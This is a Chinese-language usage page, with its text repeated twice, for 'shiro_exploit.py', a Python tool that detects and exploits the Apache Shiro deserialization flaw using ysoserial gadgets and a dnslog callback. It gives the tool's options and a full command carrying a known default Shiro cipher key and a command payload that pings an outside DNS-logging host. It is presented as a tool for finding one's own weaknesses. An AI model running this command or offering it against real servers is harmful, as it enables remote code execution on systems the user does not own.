该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境
Python2.7
requests
Jdk 1.8
使用说明
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]
OPTIONS:
-h, --help show this help message and exit
-u URL, --url URL Target url.
-t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
gadget
-p PARAMS, --params PARAMS
gadget params
-k KEY, --key KEY CipherKey
Example: python shiro_exploit.py -u target
检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。
]]>
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
工具下载地址:Shiro_Exploit
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境
Python2.7
requests
Jdk 1.8
使用说明
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]
OPTIONS:
-h, --help show this help message and exit
-u URL, --url URL Target url.
-t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
gadget
-p PARAMS, --params PARAMS
gadget params
-k KEY, --key KEY CipherKey
Example: python shiro_exploit.py -u target
检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。
]]>
